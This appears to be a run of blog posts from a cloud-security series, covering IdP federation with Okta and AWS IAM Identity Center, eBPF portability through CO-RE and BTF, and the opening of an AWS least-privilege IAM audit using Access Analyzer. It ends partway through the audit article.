The pattern I deploy in every multi-account AWS environment:

Okta (IdP)
  └── IAM Identity Center
        ├── Account: prod     → Permission Sets: ReadOnly, DevOps
        ├── Account: staging  → Permission Sets: Developer  
        ├── Account: shared   → Permission Sets: NetworkAdmin, SecurityAudit
        └── Account: sandbox  → Permission Sets: Admin (sandbox only)

# Engineers access accounts through Identity Center portal
aws configure sso
# Prompts: SSO start URL, region, account, role

aws sso login --profile prod-readonly

# List available accounts and roles (useful for tooling and scripts)
aws sso list-accounts --access-token "${TOKEN}"
aws sso list-account-roles --access-token "${TOKEN}" --account-id "${ACCOUNT_ID}"

# Get temporary credentials for a specific account/role
aws sso get-role-credentials \
  --account-id "${ACCOUNT_ID}" \
  --role-name ReadOnly \
  --access-token "${TOKEN}"

When an engineer is offboarded from Okta, they can no longer sign in to any AWS account. No individual IAM user deletion across 20 accounts. No access key hunting. One action in Okta, and the only access left is any session already issued, which ends when it expires or is revoked.

Just-in-Time (JIT) Provisioning

Rather than creating user accounts in every downstream system ahead of time, JIT provisioning creates accounts on first login:

  1. User authenticates to IdP
  2. SAML/OIDC assertion includes group memberships and attributes
  3. SP receives assertion, checks if a user account exists for this sub
  4. If not: create the account with attributes from the assertion
  5. Grant access based on group claims
  6. On subsequent logins: update the account’s attributes if claims changed

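The security property: when a user is disabled in the IdP, their account in downstream systems becomes inaccessible even if the account object still exists, because there is nothing left to log in with. That holds only when the IdP is the sole way in: API tokens, SSH keys, or local passwords the SP issued to the account keep working until they are revoked, so pair JIT provisioning with deprovisioning where the SP supports it.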
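
The six steps above reduce to a create-or-update keyed on sub. A minimal sketch on the SP side, assuming the assertion has already been validated and using an in-memory dict as the user store; `jit_login` and the field names are hypothetical.

```python
def jit_login(users: dict, assertion: dict) -> dict:
    """Create the account on first login, refresh its attributes on every login."""
    sub = assertion["sub"]  # stable identifier from the IdP, not the email
    account = users.get(sub)
    if account is None:
        account = {"sub": sub, "provisioned_by": "jit"}
        users[sub] = account
    # Attributes and group claims always come from the latest assertion, so
    # removing a group in the IdP removes the access on the next login.
    account["email"] = assertion.get("email")
    account["groups"] = sorted(assertion.get("groups", []))
    return account


users = {}
first = dict(jit_login(users, {"sub": "u-123", "email": "alice@example.com",
                               "groups": ["engineering", "oncall"]}))
second = jit_login(users, {"sub": "u-123", "email": "alice@example.com",
                           "groups": ["engineering"]})
print(len(users), first["groups"], second["groups"])
```

Keying on sub rather than email matters: email addresses get reassigned and renamed, and an account keyed on email can end up inherited by the wrong person.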


The IdP Is the Trust Anchor — Protect It Accordingly

The entire security of a federated system is bounded by the security of the IdP. If an attacker can log into Okta as an admin, they can issue valid SAML assertions for any user, for any role, to any SP that trusts Okta. Every downstream system is compromised simultaneously.

This is not theoretical. In the 2023 Caesars and MGM Resorts attacks, initial access was achieved through social engineering against identity provider support — not through technical exploitation of cloud infrastructure. Once identity infrastructure is compromised, everything downstream follows.

What this means practically:

  • MFA for all IdP admin accounts — hardware FIDO2 keys, not TOTP. TOTP codes can be phished in real-time. Hardware keys cannot.
  • PIM / JIT access for IdP configuration changes — no standing admin access
  • Separate monitoring and alerting for IdP admin activity
  • Audit who can modify SAML/OIDC configurations and attribute mappings in the IdP — these are the levers for privilege escalation
  • Narrow audience restrictions — configure which SPs can receive assertions; don’t create a wildcard IdP configuration that serves all SPs

Conditional Access — Adding Context to Federation

Modern IdPs support Conditional Access policies that restrict when assertions are issued:

// Entra ID Conditional Access: require MFA + compliant device for AWS access
{
  "conditions": {
    "applications": {
      "includeApplications": ["AWS-Application-ID-in-Entra"]
    },
    "users": {
      "includeGroups": ["all-employees"]
    },
    "locations": {
      "excludeLocations": ["NamedLocation-CorporateNetwork"]
    }
  },
  "grantControls": {
    "operator": "AND",
    "builtInControls": ["mfa", "compliantDevice"]
  }
}

This policy: when an employee accesses AWS from outside the corporate network, they must use MFA on a device that MDM has verified as compliant. Sign-ins from the excluded named location fall outside this policy entirely, so a separate policy has to cover in-network access if you want MFA or device compliance enforced there too.

Conditional Access is how you move beyond “authenticated to IdP” as the only gate. Device health, network location, risk score — these become inputs to the access decision.
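
To see how the conditions and grant controls interact, here is a toy evaluator for the policy shown above. It is a deliberately simplified sketch of a single policy and is not how Entra ID evaluates Conditional Access (which combines all applicable policies); `evaluate` and the shape of the `sign_in` dict are assumptions for illustration.

```python
POLICY = {
    "conditions": {
        "applications": {"includeApplications": ["AWS-Application-ID-in-Entra"]},
        "users": {"includeGroups": ["all-employees"]},
        "locations": {"excludeLocations": ["NamedLocation-CorporateNetwork"]},
    },
    "grantControls": {"operator": "AND", "builtInControls": ["mfa", "compliantDevice"]},
}


def evaluate(policy: dict, sign_in: dict) -> str:
    """Return 'not_applicable', 'grant', or 'block' for one sign-in attempt."""
    cond = policy["conditions"]
    applies = (
        sign_in["application"] in cond["applications"]["includeApplications"]
        and bool(set(sign_in["groups"]) & set(cond["users"]["includeGroups"]))
        and sign_in["location"] not in cond["locations"]["excludeLocations"]
    )
    if not applies:
        return "not_applicable"  # this policy imposes nothing on the sign-in
    required = policy["grantControls"]["builtInControls"]
    met = [control in sign_in["satisfied_controls"] for control in required]
    ok = all(met) if policy["grantControls"]["operator"] == "AND" else any(met)
    return "grant" if ok else "block"


remote = {"application": "AWS-Application-ID-in-Entra", "groups": ["all-employees"],
          "location": "Home", "satisfied_controls": ["mfa"]}
remote_compliant = dict(remote, satisfied_controls=["mfa", "compliantDevice"])
in_office = dict(remote, location="NamedLocation-CorporateNetwork", satisfied_controls=[])

print(evaluate(POLICY, remote), evaluate(POLICY, remote_compliant), evaluate(POLICY, in_office))
```

The in-office result is the one to notice: an excluded location means the policy does not apply at all, which is different from the policy being satisfied.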


Framework Alignment

Framework Reference | What It Covers Here
--- | ---
CISSP Domain 5: Identity and Access Management | Federation is the mechanism for extending identity trust across organizational boundaries
CISSP Domain 3: Security Architecture | Trust relationships must be explicitly designed; overly broad federation trust is an architectural failure
ISO 27001:2022 5.19 Information security in supplier relationships | Federation with third-party IdPs and SPs establishes a cross-organizational trust boundary that must be governed
ISO 27001:2022 8.5 Secure authentication | SAML and OIDC are the secure authentication protocols for federated access, including token validation requirements
ISO 27001:2022 5.17 Authentication information | Credential lifecycle in federated systems: no passwords distributed to SPs; IdP manages authentication
SOC 2 CC6.1 | Federated identity is the access control mechanism for human access to cloud environments in CC6.1
SOC 2 CC6.6 | Logical access from outside system boundaries: federation with external IdPs and partner organizations

Key Takeaways

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t need to manage them independently
  • SAML is XML-based, browser-oriented, widely supported for enterprise SSO; OIDC is JWT-based, API-friendly, the protocol for modern workload identity and consumer SSO
  • In OIDC, the sub condition in trust policies is what prevents any workload from assuming any role — omitting it is a critical misconfiguration
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but they need correct configuration
  • The IdP is the trust anchor — its security posture bounds the security of every system that trusts it. Treat IdP admin access with the same controls as your most sensitive systems.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

What’s Next

EP11 brings this into Kubernetes — RBAC, service account tokens, and how the Kubernetes authorization layer interacts with cloud IAM. Two separate systems, both requiring security. A gap in either becomes a gap in both.


CO-RE and libbpf — Write Once, Run on Any Kernel

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 6


TL;DR

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

eBPF CO-RE (Compile Once, Run Everywhere) solves the kernel portability problem. It is the reason Cilium and Falco survive kernel upgrades without recompilation. The maps episode quietly assumed that the kernel structs those programs read look the same tomorrow as they do today. They don’t. The Linux kernel has no stable ABI for internal data structures. The structs eBPF programs read constantly (task_struct, sk_buff, sock) can shift between patch releases, not just major versions. I learned this the hard way when a routine upgrade from 5.15.0-89 to 5.15.0-91, two patch revisions, broke a custom tracer I’d been running in production for six months.


Six months after deploying a custom eBPF tracer for a client — it detected specific syscall patterns that Falco’s default ruleset didn’t cover — they ran a routine Ubuntu patch upgrade. Not a major kernel version jump. 5.15.0-89 to 5.15.0-91. Two patch revisions.

The tracer stopped loading. The error was invalid indirect read from stack. I opened the program source: nothing remotely like an indirect read. The program was a straightforward tracepoint handler, maybe 40 lines of C.

Three hours of debugging led to a four-byte offset difference. The struct task_struct had a field alignment change between the two patch versions. My program accessed ->comm at a hardcoded byte offset. On 5.15.0-89 that offset was 0x620. On 5.15.0-91 it was 0x624. The verifier caught the misalignment — correctly — and rejected the program.

I had compiled the eBPF bytecode against a fixed kernel header snapshot. The binary was not portable. Every time the kernel moved a struct field, the tool broke.

CO-RE is the solution to this.

Why Kernel Structs Change and Why It Matters

The Linux kernel has no stable ABI for internal data structures. task_struct, sock, sk_buff, file — the structs that eBPF programs read constantly — change between releases. Field additions, reordering, alignment changes, struct embedding changes. The kernel developers are under no obligation to preserve internal layouts, and they don’t.

Before CO-RE, eBPF programs dealt with this in two ways:

BCC (BPF Compiler Collection) — compile the eBPF C code at runtime on the target host, using that system’s kernel headers. No portability problem because compilation happens on the machine you’re deploying to. Cost: you need a full compiler toolchain, kernel headers, and Python runtime on every production node. Startup time in seconds. Container image size in hundreds of MB. For a security tool that should be lightweight and fast-starting, this is a non-starter.

Per-kernel compiled binaries — ship different builds for each supported kernel version, detect at runtime, load the matching binary. Falco maintained this model for years. The operational overhead is significant: a matrix of kernel × distro × version with separate build and test pipelines for each combination.

CO-RE is the third option. Compile once on a build machine, and let libbpf patch struct field accesses at load time on the target system, using type information embedded in the running kernel.

BTF: The Type System That Makes CO-RE Possible

BTF (BPF Type Format) is compact type debug information embedded directly into the kernel image. The CONFIG_DEBUG_INFO_BTF option arrived in Linux 5.2; from 5.4 onward, kernels built with CONFIG_DEBUG_INFO_BTF=y expose their full type information at /sys/kernel/btf/vmlinux.

# Verify BTF is available
ls -la /sys/kernel/btf/vmlinux

# Inspect the BTF for a specific struct
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -A 5 'task_struct'

# See the actual field offsets the running kernel uses
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 20 'struct task_struct {'

BTF encodes every struct definition with field names, types, and byte offsets. When libbpf loads an eBPF program compiled with CO-RE relocations, it reads both the BTF the program was compiled against (embedded in the .bpf.o file) and the BTF of the running kernel. If task_struct->comm has moved, libbpf patches the field access instruction before loading the program.

This patching happens at load time, transparently, without modifying the binary you shipped.

Most distribution kernels now ship with BTF enabled:

# Ubuntu 20.04+ (kernel 5.4+)
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y

# Check at runtime: the file is readable only when the kernel exposes BTF
test -r /sys/kernel/btf/vmlinux && echo "BTF available"

Amazon Linux 2023, Ubuntu 22.04, Debian 11+, RHEL 8.2+, and most cloud-provider-managed kernels have BTF. The notable exceptions: RHEL 7 and Amazon Linux 2 on older kernels.

The CO-RE Toolchain

The build pipeline for a CO-RE eBPF program:

Development machine:
  vmlinux.h (generated from kernel BTF)
       ↓
  myprog.bpf.c ──── clang -target bpf -g ────→ myprog.bpf.o
  (CO-RE relocations recorded in the .BTF.ext section)
       ↓
  bpftool gen skeleton myprog.bpf.o ─────────→ myprog.skel.h
       ↓
  myprog.c (userspace) ── gcc ──→ myprog
  (statically links libbpf, skeleton handles load/attach/cleanup)

Target machine (any kernel with BTF, 5.4+):
  ./myprog
  ↓ libbpf reads /sys/kernel/btf/vmlinux
  ↓ patches field accesses to match current kernel struct layout
  ↓ verifier validates patched program
  ↓ program loads and runs

One binary. Any supported kernel. No compiler on the target system.

vmlinux.h — One Header to Replace Them All

Before CO-RE, eBPF C programs included dozens of kernel headers — linux/sched.h, linux/net.h, linux/fs.h, linux/socket.h — and they had to match the exact kernel version you were targeting.

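vmlinux.h is generated from the BTF of a running kernel. It contains every struct, union, enum, and typedef the kernel exposes through BTF, in a single file, without any compile-time dependency on kernel headers. BTF does not record preprocessor macros, so any #define constants a program needs must be declared separately.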

# Generate vmlinux.h from the running kernel
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

# Typical size
wc -l vmlinux.h
# 350000+

You commit vmlinux.h to your repository, generated from a representative kernel. CO-RE handles the actual layout differences at load time on whatever kernel you deploy to. The file is large but you only generate it once and update it when you add support for a new kernel generation.

In your eBPF C source:

#include "vmlinux.h"           // replaces all kernel headers
#include <bpf/bpf_helpers.h>   // eBPF helper functions
#include <bpf/bpf_tracing.h>   // tracing macros
#include <bpf/bpf_core_read.h> // CO-RE read macros

How CO-RE Fixes the Offset Problem

The mechanism is worth understanding once, even if you’re not writing eBPF programs.

When a CO-RE eBPF program accesses a kernel struct field, it doesn’t hardcode the byte offset. Instead, it records a relocation — “I need the offset of pid inside task_struct” — in the compiled binary. When libbpf loads the program, it resolves each relocation by looking up the field in the running kernel’s BTF and patches the access instruction to use the correct offset for this specific kernel.

This is why my four-byte problem happened: the tracer I’d compiled wasn’t using CO-RE. It hardcoded 0x620 as the offset of task_struct->comm. When the kernel moved it to 0x624, the program accessed the wrong memory, the verifier caught the misalignment, and the load failed. A CO-RE rewrite would have resolved comm’s offset at load time from BTF and never known the difference.

The relocation model also handles fields that don’t exist on older kernels. If a program accesses a field added in kernel 5.15 and the running kernel is 5.10, the outcome depends on how the program marks the access: an access guarded by an existence check such as bpf_core_field_exists() takes a fallback path (for example, reporting a zero value), while an unguarded access fails the load. This is how tools ship support for features across a kernel version range without separate builds.
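To make the relocation step concrete, here is a toy Python model of it. It is a sketch only: real libbpf works on binary BTF and BPF instructions, not dictionaries. The names BUILD_BTF, TARGET_BTF, Relocation, and apply_relocations are hypothetical, and the pid offset is invented; the two comm offsets are the ones from the tracer story. The guarded flag stands in for a program that checks whether a field exists before reading it.

```python
from dataclasses import dataclass

# Toy "BTF": struct name -> {field name -> byte offset}.
# The pid offset is made up; the comm offsets come from the story above.
BUILD_BTF = {"task_struct": {"pid": 0x4E8, "comm": 0x620}}
TARGET_BTF = {"task_struct": {"pid": 0x4E8, "comm": 0x624}}


@dataclass
class Relocation:
    insn_index: int        # which instruction's offset to patch
    struct: str
    field: str
    guarded: bool = False  # True if the program tests for the field first


def apply_relocations(insn_offsets, relocations, target_btf):
    """Return a patched copy of insn_offsets using the target kernel's layout."""
    patched = list(insn_offsets)
    for r in relocations:
        offset = target_btf.get(r.struct, {}).get(r.field)
        if offset is None:
            if r.guarded:
                patched[r.insn_index] = None  # access is skipped at runtime
                continue
            raise LookupError(f"{r.struct}.{r.field} not found on target kernel")
        patched[r.insn_index] = offset
    return patched


# Offsets as compiled on the build machine, plus the relocation records.
compiled = [BUILD_BTF["task_struct"]["pid"], BUILD_BTF["task_struct"]["comm"]]
relocs = [Relocation(0, "task_struct", "pid"), Relocation(1, "task_struct", "comm")]
loaded = apply_relocations(compiled, relocs, TARGET_BTF)
```

After the call, loaded holds the target kernel's offsets, so the comm access lands on 0x624 even though the program was built against 0x620. An unguarded relocation for a field missing from the target raises, which mirrors a failed load.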

What CO-RE Means for Tools You Already Run

This is why you care about CO-RE even if you’re never going to write an eBPF program yourself.

Falco, Cilium, Tetragon, and Pixie all ship as single binaries or container images. You install them on an Ubuntu 22.04 node, a RHEL 9 node, and an Amazon Linux 2023 node (three different kernel versions, three different task_struct layouts) and the same binary works on all of them. Before CO-RE, Falco maintained pre-compiled kernel probes for every supported kernel version in a matrix of distro × kernel × version. The probe list had thousands of entries. A kernel your distro shipped between Falco release cycles meant a gap in coverage until the next release.

With CO-RE, there’s one binary. libbpf reads the running kernel’s BTF at load time, patches the field accesses to match the actual struct layout, and the verifier checks the patched program. The tool vendor doesn’t need to know about your specific kernel. You don’t need to wait for a probe release.

The constraint is BTF availability. Check your nodes:

# Quick check — if this file exists, CO-RE tools work
ls /sys/kernel/btf/vmlinux

# Full confirmation
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y  ← required

What you’ll find: Ubuntu 20.04+, Debian 11+, RHEL 8.2+, Amazon Linux 2023, and GKE/EKS managed nodes all have BTF. RHEL 7 and Amazon Linux 2 on older kernels do not. On those nodes, tools typically fall back to a legacy path such as BCC-style on-host compilation, which requires kernel headers installed on the node.

The One Thing to Run Right Now

This command shows you the exact struct layout your running kernel uses — the same layout libbpf reads when it patches CO-RE programs at load time:

# See how your kernel defines task_struct right now
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 30 '^struct task_struct {'

The output is the canonical type information for your running kernel: every field, in layout order (the raw format additionally prints each member’s bits_offset). When libbpf loads a CO-RE program, it’s reading this to figure out whether task_struct->comm is at offset 0x620 or 0x624.

You can also see specific struct sizes and verify that two kernels differ:

# On kernel A (5.15.0-89)
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -w "task_struct" | head -3

# On kernel B (5.15.0-91) — same command, different output if struct changed
# This is what broke my tracer: field offset changed across a two-patch jump

The practical use: when a CO-RE eBPF tool fails to load with a BTF error, this is where you look. The error tells you which struct field the relocation failed on. This command shows you the current layout. You can confirm whether the field exists, whether it moved, whether it was renamed.
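When you have raw dumps from two kernels, the comparison can be scripted. The following Python sketch assumes the raw dump prints each type as a bracketed header line such as [id] STRUCT 'name', followed by indented 'member' type_id=N bits_offset=N lines; check that against your bpftool version. KERNEL_A and KERNEL_B are hand-written stand-ins, not captured output, and the pid offset is invented. The comm offsets are the two from the tracer story.

```python
import re

# Matches an indented member line and captures its name and bit offset.
MEMBER_RE = re.compile(r"^\s+'(?P<name>[^']+)' type_id=\d+ bits_offset=(?P<bits>\d+)")


def parse_struct(raw_dump: str, struct_name: str) -> dict:
    """Map field name -> byte offset for one struct in raw BTF dump text."""
    offsets, inside = {}, False
    for line in raw_dump.splitlines():
        if line.startswith("["):
            # A new type record begins; note whether it is the struct we want.
            inside = f"STRUCT '{struct_name}'" in line
            continue
        m = MEMBER_RE.match(line) if inside else None
        if m:
            offsets[m["name"]] = int(m["bits"]) // 8
    return offsets


def diff_layouts(old: dict, new: dict) -> dict:
    """Return {field: (old_offset, new_offset)} for fields that moved or vanished."""
    return {f: (old[f], new.get(f)) for f in old if new.get(f) != old[f]}


# Illustrative dump text only (12544 bits = 0x620 bytes, 12576 bits = 0x624 bytes).
KERNEL_A = """[1] STRUCT 'task_struct' size=9792 vlen=2
\t'pid' type_id=5 bits_offset=10048
\t'comm' type_id=9 bits_offset=12544
"""
KERNEL_B = KERNEL_A.replace("12544", "12576")

moved = diff_layouts(parse_struct(KERNEL_A, "task_struct"),
                     parse_struct(KERNEL_B, "task_struct"))
```

Here moved contains a single entry for comm, pairing the old byte offset with the new one. A field that vanished on the newer kernel would show up with None as its new offset.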

BCC vs libbpf vs bpftrace

Three approaches to eBPF development, with distinct tradeoffs:

| | BCC | libbpf + CO-RE | bpftrace |
|---|---|---|---|
| Compilation | Runtime on target host | Build-time on dev machine | Runtime (embedded LLVM) |
| Target deployment | Compiler + headers on every node | Single static binary | bpftrace binary only |
| Portability | Compile-on-target handles it | CO-RE + BTF handles it | Internal CO-RE support |
| Memory overhead | High (Python + compiler: 200MB+) | Low (few MB binary) | Medium |
| Startup time | Seconds (compilation) | Milliseconds | Seconds (JIT compile) |
| Best for | Prototyping, development | Production tools, shipped software | Interactive debugging sessions |
| Language | Python + C | C (kernel) + C/Go/Rust (userspace) | bpftrace scripting |

For anything you’re shipping — an eBPF-based security tool, an observability agent, an open-source project — libbpf + CO-RE is the right choice. BCC is for prototyping before you commit to an implementation. bpftrace is for the 30-second debugging session on a live node.

The practical test: if you’re building something you’ll deploy as a container image or a package, it needs to be a self-contained binary with no build dependencies on the target system. That means libbpf.

Common Mistakes

| Mistake | Impact | Fix |
|---|---|---|
| Direct struct dereference instead of BPF_CORE_READ | Program breaks on any kernel struct change | Use BPF_CORE_READ() for all kernel struct field access |
| Missing char LICENSE[] SEC("license") = "GPL" | GPL-only helpers (most tracing helpers) unavailable | Always include the license section |
| vmlinux.h generated on a very old kernel | Missing structs added in newer kernel releases | Regenerate from the highest kernel version you target |
| Forgetting -g flag in clang invocation | No BTF debug info → no CO-RE relocations | Always compile with -g -O2 -target bpf |
| Hardcoding struct offsets as integer constants | Breaks silently on next kernel patch | Use BTF-aware CO-RE macros exclusively |

Key Takeaways

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

What’s Next

CO-RE makes eBPF programs portable across kernel versions. EP07 takes the next question: where in the kernel’s data path does it make sense to attach them?

XDP fires before the kernel has allocated a single byte of memory for an incoming packet — before the kernel even knows whether to accept it. That hook placement is why Cilium can do line-rate load balancing and why some network filtering rules that look correct in iptables do nothing against certain traffic. The rules weren’t wrong. The hook was in the wrong place.

Next: XDP — packets processed before the kernel knows they arrived


AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Reading Time: 10 minutes

Meta Description: Run an AWS least privilege audit using Access Analyzer — right-size IAM policies from wildcard permissions to scoped, production-safe roles.




TL;DR

  • The average IAM entity uses less than 5% of its granted permissions — the 95% excess is attack surface, not waste
  • AWS Access Analyzer generates a least-privilege policy from 90 days of CloudTrail data — use it on every Lambda role, ECS task role, and EC2 instance profile
  • GCP IAM Recommender surfaces specific right-sizing suggestions based on 90-day activity and tracks them until you act on them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build aws accessanalyzer validate-policy into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

The Big Picture

  THE LEAST PRIVILEGE AUDIT CYCLE

  ┌─────────────────────────────────────────────────────────────────┐
  │  1. INVENTORY  What identities exist, what policies attached?  │
  │  aws iam get-account-authorization-details                      │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  2. CLASSIFY  Group by purpose: human / CI-CD / app / data     │
  │  Expected permission profile per class — deviations are findings│
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  3. FIND UNUSED  Granted vs Used gap (average: 95% excess)     │
  │  AWS: Access Analyzer generated policy + last-accessed data     │
  │  GCP: IAM Recommender  │  Azure: Defender + Access Reviews     │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  4. RIGHT-SIZE  Replace wildcards with scoped permissions       │
  │  Remove unused services · pin resource ARNs · add conditions   │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  5. GUARD  Validate in CI/CD before any policy merges          │
  │  aws accessanalyzer validate-policy → fail pipeline if findings │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  6. MONITOR  Weekly: new findings  Quarterly: full review      │
  │  On offboarding: immediate direct-permission audit             │
  └───────────────────────────┬─────────────────────────────────────┘
                              │
                              └──────────────────── back to 1

The AWS least privilege audit tools covered in this episode map directly onto steps 3–5. The cycle is the practice.


Introduction

An AWS least privilege audit starts by measuring the gap between what each identity is granted and what it actually uses. Then it closes that gap with the tooling AWS, GCP, and Azure all provide natively. The numbers from real environments are consistently worse than teams expect.

Last year I audited an AWS account for an e-commerce company. They’d been running in production for three years. Eight engineers, two teams, a moderately complex microservices architecture. Reasonable people, competent engineers, no obvious security negligence.

When I ran the IAM Access Analyzer policy generation job against their 12 Lambda execution roles and waited for it to pull 90 days of CloudTrail data, here’s what I found:

The average Lambda role had 47 granted permissions. The average Lambda was actually using 6 of them over 90 days. That’s a utilization rate of roughly 13%. The other 87% — the 41 permissions nobody was using — sat there as silent attack surface.

The worst example was a Lambda that processed image thumbnails. Its role had AmazonS3FullAccess plus AmazonDynamoDBFullAccess plus AWSLambdaFullAccess. Someone had attached three AWS managed policies early in development to “make sure everything worked” and never came back to tighten it. The Lambda needed three permissions: s3:GetObject on one bucket, s3:PutObject on another, and logs:CreateLogGroup. That’s it. Instead it had s3:* on all S3, full DynamoDB including delete, and the ability to create and delete other Lambda functions.

If an attacker had exploited a vulnerability in that image processor — a malformed image, a dependency with a CVE — they’d have had full S3 access, full DynamoDB access, and the ability to backdoor other Lambda functions. Not because anyone intended that. Because “make it work first, fix it later” is how IAM configurations drift.

This episode is “fix it later.” The tools exist. The methodology is straightforward. The gap between knowing you should do this and actually doing it is usually not understanding the tooling.


The Fundamental Problem: Granted vs Used

The central insight of IAM auditing is simple: what an identity is granted and what it actually uses are rarely the same thing.

AWS has published data from their own customer environments: the average IAM entity uses less than 5% of the permissions it has been granted. That 95% excess is not wasted. It’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

The tools to close this gap exist on all three platforms. The difference between organizations that operate at low IAM risk and those that don’t is usually not knowledge. It’s the discipline of actually running these tools regularly and acting on what they find.


AWS IAM Auditing

Last Accessed Data — The Starting Point

AWS tracks when each service was last called by each IAM entity. This tells you which service permissions have never been used:

# Generate last-accessed data for a specific role and capture the job ID
JOB_ID=$(aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/LambdaImageProcessor \
  --query JobId --output text)

# Poll until complete (usually 30-60 seconds)
aws iam get-service-last-accessed-details --job-id "${JOB_ID}"

# Parse: find services that were never called
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | select(.TotalAuthenticatedEntities == 0) | .ServiceName'
# These services have never been accessed by this role — permissions can be removed
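The same filter is easy to apply in a script once the JSON response is saved. A minimal Python sketch, assuming the response has the JobStatus and ServicesLastAccessed fields used in the jq filter above; never_used_services and SAMPLE are hypothetical names, and the sample data is invented to mirror the thumbnail Lambda:

```python
def never_used_services(response: dict) -> list:
    """Return names of services with no authenticated access in the tracking window."""
    if response.get("JobStatus") != "COMPLETED":
        # The job is asynchronous; partial results would be misleading.
        raise RuntimeError(f"job not finished: {response.get('JobStatus')}")
    return sorted(
        s["ServiceName"]
        for s in response.get("ServicesLastAccessed", [])
        if s.get("TotalAuthenticatedEntities", 0) == 0
    )


# Invented sample shaped like the CLI output.
SAMPLE = {
    "JobStatus": "COMPLETED",
    "ServicesLastAccessed": [
        {"ServiceName": "Amazon S3", "TotalAuthenticatedEntities": 1},
        {"ServiceName": "Amazon DynamoDB", "TotalAuthenticatedEntities": 0},
        {"ServiceName": "AWS Lambda", "TotalAuthenticatedEntities": 0},
    ],
}

removable = never_used_services(SAMPLE)
```

For this sample, removable lists DynamoDB and Lambda, the two services whose permissions were granted but never exercised.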

For finer granularity — which specific actions are used within a service:

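JOB_ID=$(aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:policy/AppServerPolicy \
  --granularity ACTION_LEVEL \
  --query JobId --output text)

# List each used service with the last-used time of its tracked actions
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] |
    select(.TotalAuthenticatedEntities > 0) |
    {service: .ServiceName, last_used: .LastAuthenticated,
     actions: [.TrackedActionsLastAccessed[]? | {action: .ActionName, last_used: .LastAccessedTime}]}'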

Access Analyzer — Generated Least-Privilege Policies

This is the tool I use most. It pulls 90 days of CloudTrail data for a role and generates a policy containing only the actions actually called:

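# Start a policy generation job and capture the job ID.
# accessRole is a placeholder: a role Access Analyzer can assume to read the trail.
JOB_ID=$(aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/LambdaImageProcessor"
  }' \
  --cloud-trail-details '{
    "trails": [{
      "cloudTrailArn": "arn:aws:cloudtrail:ap-south-1:123456789012:trail/management-events",
      "allRegions": true
    }],
    "accessRole": "arn:aws:iam::123456789012:role/ACCESS_ANALYZER_TRAIL_ROLE",
    "startTime": "2026-01-01T00:00:00Z",
    "endTime": "2026-04-01T00:00:00Z"
  }' \
  --query jobId --output text)

aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"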

The output is a valid IAM policy document containing only what was called. Compare it against the current policy — the delta is everything that can be removed. I treat the generated policy as a starting point, not a final answer: occasionally a permission is needed but wasn’t exercised in the 90-day window (error handling paths, quarterly jobs, incident response capabilities). Review the generated policy against the function’s known requirements before applying it verbatim.
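Computing that delta by hand gets tedious when the current policy uses wildcards. A small Python sketch of the comparison, assuming you have already flattened both policies into lists of action strings; unused_patterns is a hypothetical helper, and the lists below reproduce the thumbnail Lambda from the introduction. IAM action names are case-insensitive, so both sides are lowercased before matching.

```python
from fnmatch import fnmatchcase


def unused_patterns(granted: list, used: list) -> list:
    """Return granted action patterns that match none of the actions actually used."""
    used_lower = [a.lower() for a in used]
    return [
        pattern
        for pattern in granted
        if not any(fnmatchcase(action, pattern.lower()) for action in used_lower)
    ]


# Granted: what the three attached managed policies boil down to, plus logging.
granted = ["s3:*", "dynamodb:*", "lambda:*", "logs:CreateLogGroup"]
# Used: the actions in the generated policy.
used = ["s3:GetObject", "s3:PutObject", "logs:CreateLogGroup"]

candidates = unused_patterns(granted, used)
```

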